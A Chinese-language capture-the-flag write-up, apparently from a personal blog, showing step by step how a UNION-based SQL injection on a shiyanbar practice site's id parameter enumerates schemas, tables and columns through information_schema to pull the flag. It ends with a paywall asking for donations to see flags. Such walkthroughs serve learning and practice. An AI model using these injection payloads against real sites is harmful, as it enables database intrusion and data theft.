测试id是否为注入点,发现,是存在注入点的

提交

http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,1

ID content
1 Welcome to This Game!Enjoy~~~
1 1

 

现在要做的就是猜表名和字段名

可以首先看看数据库名

http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,SCHEMA_NAME from information_schema.SCHEMATA

ID content
1 Welcome to This Game!Enjoy~~~
1 information_schema
1 my_db

 

然后就是猜表名

http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,TABLE_NAME from information_schema.TABLES

发现 thiskey 表名是可疑的

猜字段名

http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,COLUMN_NAME from information_schema.COLUMNS

发现 k0y 字段名是可疑的

于是提交

http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,k0y from thiskey

得到

ID content
1 Welcome to This Game!Enjoy~~~
1 flag

Flag:

温馨提示: 此处内容需要评论本文后刷新才能查看,支付2元即可直接查看所有Flag。

小广告:关于获取西普实验吧所有Flag请点击这里查看索引

查看所有Flag文章需要输入密码,需要获取文章密码的童鞋请扫描下面微信或支付宝二维码捐助至少2元(老哥,捐多捐少是个缘分)之后发送支付凭证号联系我获取,Flag大全地址:Flag大全

新功能:捐款的小伙伴请联系我把自己的注册邮箱加入网站白名单,可以免回复看到本站所有Flag

PS:本站不是实验吧的官方站点,纯粹是个人博客,收取Flag费用仅是维持服务器费用,做站不易,且行窃珍惜!

微信二维码:
支付宝二维码: